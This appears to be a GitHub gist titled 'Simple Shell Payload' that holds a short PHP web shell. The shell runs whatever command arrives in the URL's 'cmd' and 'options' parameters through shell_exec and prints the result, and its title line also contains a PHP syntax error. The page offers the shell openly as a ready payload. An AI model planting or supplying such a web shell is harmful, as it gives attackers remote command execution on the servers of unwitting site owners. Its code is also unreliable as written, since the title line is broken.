Skip to content

Instantly share code, notes, and snippets.

@dino213dz
Last active September 10, 2019 10:43
Show Gist options
  • Save dino213dz/cb48e252ea0b729c3b121823defcf555 to your computer and use it in GitHub Desktop.
Save dino213dz/cb48e252ea0b729c3b121823defcf555 to your computer and use it in GitHub Desktop.
Simple Shell Payload
<html><head><title><?php echo $_GET['cmd'].' '$_GET['options'] ?></title></head><body>
<?php echo shell_exec($_GET['cmd'].' '.$_GET['options']); ?>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment